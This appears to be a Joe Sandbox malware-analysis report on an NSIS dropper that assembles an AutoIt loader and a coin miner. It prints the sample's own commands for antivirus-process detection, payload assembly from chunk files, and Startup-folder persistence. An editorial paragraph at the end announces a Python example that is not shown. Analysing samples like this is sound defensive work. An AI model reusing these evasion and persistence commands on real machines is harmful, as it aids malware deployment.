Source: explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: file.exe; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe; String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000012.00000003.2642127911.0000000001335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264409592.0000000001336000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 00000012.00000003.2611556085.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354580125.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3264505846.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703373555.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354530325.00000000013C3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: file.exe; String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe; String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe; String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe; String found in binary or memory: http://ocsp.entrust.net03
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Reynolds.com, ZeusChat.scr; String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, Reynolds.com, 0000000A.00000000.2066097134.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, ZeusChat.scr, 00000010.00000000.2205239967.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, Reynolds.com, 00000011.00000000.2255000492.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2411864117.0000000015614000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr, 00000014.00000000.2409093623.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr, 00000015.00000000.2415165241.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe; String found in binary or memory: http://www.entrust.net/rpa03
Source: explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://github.com/horsicq/DIE-engine
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: file.exe; String found in binary or memory: https://www.entrust.net/rpa0
Source: Tech.0.dr; String found in binary or memory: https://www.globalsign.com/repository/0
Source: Reynolds.com, 0000000A.00000003.2079865873.000001A69B00A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2313532248.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, ZeusChat.scr.10.dr, Reynolds.com.2.dr, Tech.0.dr; String found in binary or memory: https://www.globalsign.com/repository/06
Source: explorer.exe, 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.virustotal.com/en/search/?query=
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW

              Spam, unwanted Advertisements and Ransom Demands

              barindex
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Americans entropy: 7.99760011473
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Satin entropy: 7.99764862118
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Rid entropy: 7.9977091016
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Eagle entropy: 7.99799114247
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Matching entropy: 7.99710399078
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Eugene entropy: 7.99803047909
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Smithsonian entropy: 7.99798906004
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Exhibits entropy: 7.99744911231
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Psychiatry entropy: 7.99633350563
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Through entropy: 7.99745463306
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Dealing entropy: 7.99815989653
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Carlo entropy: 7.99711927339
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Hotel entropy: 7.99835032646
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Landscape entropy: 7.99751935648
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Wendy entropy: 7.99809069172
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Expert entropy: 7.99780337689
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Turns entropy: 7.99807412881
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Holdem entropy: 7.99752904365
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Ai entropy: 7.99764618877
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Households entropy: 7.99708688405
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Guy entropy: 7.99699953217
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Result entropy: 7.99746905943
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Elliott entropy: 7.99808822812
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Norway entropy: 7.99778041078
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Exempt entropy: 7.99612802037
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Blvd entropy: 7.99621538932
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Jungle entropy: 7.99756807934
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Biodiversity entropy: 7.99816036628
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Chan entropy: 7.99708921533
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Typical entropy: 7.99755405965
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Def entropy: 7.99714947873
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Ebooks entropy: 7.99790460139
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Odds entropy: 7.99741776079
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Peeing entropy: 7.99746302181
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Innocent entropy: 7.99812179691
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Sucking entropy: 7.99806777596
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Resolutions entropy: 7.99730244217
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Delaware entropy: 7.99692887592
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Tm entropy: 7.99791944878
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Actual entropy: 7.99741011645
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Drums entropy: 7.99729494549
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Lambda entropy: 7.99792392141
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Same entropy: 7.99747556
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Games entropy: 7.99745741408
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Jpg entropy: 7.99792471662
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Individuals entropy: 7.99688013161
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Nervous entropy: 7.99786086382
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Seafood entropy: 7.99764350559
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\29442\l entropy: 7.99994417377
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | File created: C:\Users\user\AppData\Local\CyberSphere Dynamics\M entropy: 7.99994417377

              System Summary

Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA21394 NtAlpcCreatePortSection, 17_2_000002453CA21394
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 21_2_0000014D5CA91394 NtQueryInformationByName, 21_2_0000014D5CA91394
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\DownReceptor
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\ComfortSick
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\IdeasApp
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\CentralAvoiding
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\JoiningMazda
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\UruguayNorthern
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\MozambiqueAppropriate
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\TeddySecretariat
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\OrganDiscretion
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\VatBukkake
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\KeyboardsTwin
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004062CF appears 58 times
Source: file.exe | Static PE information: invalid certificate
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: classification engine | Classification label: mal100.rans.expl.evad.mine.winEXE@38/58@3/1
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA174124 GetLastError,FormatMessageW, 17_2_00007FF7AA174124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA16C46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 17_2_00007FF7AA16C46C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA17368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 17_2_00007FF7AA17368C
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | File created: C:\Users\user\AppData\Local\CyberSphere Dynamics
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsgBEEE.tmp
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Windows\explorer.exe
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process created: C:\Windows\explorer.exe explorer.exe
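The process-creation records above describe the whole loader chain: cmd.exe assembles a payload with copy /b from dozens of chunk files into a file named l, runs it through a dropped PE with a .com extension from %TEMP%, that process writes a Startup .url through a second cmd.exe, wscript.exe later launches the dropped ZeusChat.scr, and both the .com and the .scr spawn explorer.exe, which is the process that later carries the network connection. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the parent/child tree from those records and applies editor-written heuristics to each edge. The records are transcribed from the lines above (the 49-operand copy /b command is shortened to five operands); the path markers, extension lists and rule wording are assumptions of this example, not the sandbox's signatures.

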